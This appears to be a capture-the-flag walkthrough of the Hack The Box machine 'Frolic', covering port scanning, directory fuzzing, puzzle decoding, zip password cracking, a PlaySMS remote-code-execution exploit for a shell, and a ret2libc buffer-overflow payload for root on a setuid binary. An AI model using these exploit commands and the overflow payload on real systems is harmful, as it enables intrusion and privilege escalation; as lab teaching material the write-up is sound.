Walkthrough - Frolic

Tags: , ,

Categories: ,


This was a good practice of decoding stuff, web exploitation and rop exploitation. Overall a decent box and easy points. Getting user was tiring but root was fun and it did give me some ideas on future blog posts.


Before following this walkthrough, I highly recommend trying to get the flag yourself! Just like you will hear from everyone else, try harder! (if you cannot find it)


First up, we’ll scan the box using basic nmap scripts and then go from there (Enumerate!).

root@kali:~/Frolic# nmap -v -p- -sC -sV -oA nmap
# Nmap 7.70 scan initiated Thu Feb 14 11:48:48 2019 as: nmap -v -p- -sC -sV -oA nmap
Nmap scan report for
Host is up (0.25s latency).
Not shown: 65530 closed ports
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open  http        Node.js (Express middleware)
|_http-favicon: Unknown favicon MD5: 818DD6AFD0D0F9433B21774F89665EEA
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Node-RED
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m59s, deviation: 3h10m31s, median: 0s
| nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   FROLIC<00>           Flags: <unique><active>
|   FROLIC<03>           Flags: <unique><active>
|   FROLIC<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2019-02-14T22:41:15+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-02-14 12:11:15
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 14 12:11:21 2019 -- 1 IP address (1 host up) scanned in 1353.08 seconds

A few ports are open, basically running SSH, SMB and HTTP. Let’s start with the HTTP. Visting the pages, I found this..



Let’s use wfuzz on

root@kali:~/Frolic# wfuzz --hc 404 -w /usr/share/wordlists/wfuzz/general/common.txt > fuzzresult
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.                                                         

* Wfuzz 2.2.11 - The Web Fuzzer                        *

Total requests: 950

ID      Response   Lines      Word         Chars          Payload

000060:  C=301      7 L       13 W          194 Ch        "admin"
000111:  C=301      7 L       13 W          194 Ch        "backup"
000834:  C=301      7 L       13 W          194 Ch        "test"
000273:  C=301      7 L       13 W          194 Ch        "dev"

Total time: 25.19004
Processed Requests: 950
Filtered Requests: 946
Requests/sec.: 37.71331

Let’s visit these pages and go from there.


The admin page is so weird. Let’s look at the source.


Well, there’s the username and password, let’s try it out.


Excellent! But this open’s up another weird page.


I just copy pasted the string in a google search, and the first result was of a programming language, ook! Fortunately the link was for a decoder. Let’s use that.


Well that’s something. Got another directory. Let’s go there.


Not again. Well at least it’s not weird, it’s base64, at least looks like it. I will copy the text in a file and try to decode it.

root@kali:~/Frolic# base64 -d out.b64 > b64result
root@kali:~/Frolic# file b64result
b64result: Zip archive data, at least v2.0 to extract
root@kali:~/Frolic# mv b64result b64result.zip
root@kali:~/Frolic# unzip b64result.zip
Archive:  b64result.zip
[b64result.zip] index.php password:
root@kali:~/Frolic# fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt b64out.zip

PASSWORD FOUND!!!!: pw == password
root@kali:~/Frolic# unzip b64out.zip
Archive:  b64out.zip
[b64out.zip] index.php password:
  inflating: index.php
root@kali:~/Frolic# cat index.php

Let’s convert the hex to ascii using some tool. This is getting boring now.


Oh would you just! Again some base64. I am sure this time because of the padding.

root@kali:~/Frolic# base64 -d htoa > htoab64out
root@kali:~/Frolic# cat htoab64out
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>

I know this. This is Brainfuck! Literally. Let’s decode something again…


All that for some weird text. Nothing to go on now. Let’s move to another directory from the list.


Two files. Let’s visit the path …

banner banner

I could not see the /dev path so, I tried a wfuzz on it.

root@kali:~/Frolic# wfuzz --hc 404 -w /usr/share/wordlists/wfuzz/general/common.txt

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzzs documentation for more information.

* Wfuzz 2.2.11 - The Web Fuzzer                        *

Total requests: 950

ID      Response   Lines      Word         Chars          Payload    

000111:  C=301      7 L       13 W          194 Ch        "backup"
000834:  C=200      1 L        1 W            5 Ch        "test"

Total time: 24.70471
Processed Requests: 950
Filtered Requests: 948
Requests/sec.: 38.45419


Another URL. Let’s go there.


A login form. Let’s try the two usernames and passwords we have until now. The tuple (admin:idkwhatispass) worked and we are in something.


Getting a shell

I did a searchsploit on playsms and got this.

root@kali:~/Frolic# searchsploit playsms
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                               |  Path
                                                                                                                                                                                             | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)                                                                                                           | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload                                                                                                           | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                                                                                                                             | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)'                                                                                                       | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                                                                                                                          | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection                                                                                                                                                                  | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                                                                                                                               | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                                                                                                                        | exploits/php/webapps/7687.txtHappy Hacking! Cheers!

PlaySms - Remote File Inclusion                                                                                                                                                      | exploits/php/webapps/17792.txt
PlaySms - Cross-Site Request Forgery                                                                                                                                                 | exploits/php/webapps/30177.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

I used this exploit to get a shell.

root@kali:~/Frolic/CVE-2017-9101# python3 playsmshell.py --password idkwhatispass --url -i
[*] Grabbing CSRF token for login
[*] Attempting to login as admin
[+] Logged in!
[*] Grabbing CSRF token for phonebook import
[+] Entering interactive shell; type "quit" or ^D to quit
> whoami

> pwd

So we have a low privilege shell. Using some stty and python magic, I was able to upgrade to a full shell.

www-data@frolic:/home/ayush$ cat user.txt

Looking around, we have the user.txt file. On to root!

Return oriented programming

www-data@frolic:/home/ayush/.binary$ ls -l
total 8
-rwsr-xr-x 1 root root 7480 Sep 25 00:59 rop

I found a rop binary in the home directory of ayush. I am assuming that we would have to do some rop to do privilege escalation. So let’s check for ASLR.

www-data@frolic:/home/ayush/.binary$ cat /proc/sys/kernel/randomize_va_space

So, ASLR is disabled. I downloaded the binary on my local machine to try and debug it.

root@kali:~/Frolic# ./rop
[*] Usage: program <message>

root@kali:~/Frolic# ./rop $(python -c 'print "A"*10')
[+] Message sent: AAAAAAAAAA

root@kali:~/Frolic# ./rop $(python -c 'print "A"*500')
Segmentation fault

I will be posting a tutorial rop exploitation soon. But, long story short, I got the addresses for SYSTEM, exit and /bin/sh on the box and used them to create an exploit and did the following.

www-data@frolic:/home/ayush/.binary$ ./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
# id
# cat root.txt

Voila! We have the root.txt file. It was a decent box except the continuous decoding. But obtaining the root was a good exercise.

Happy Hacking! Cheers!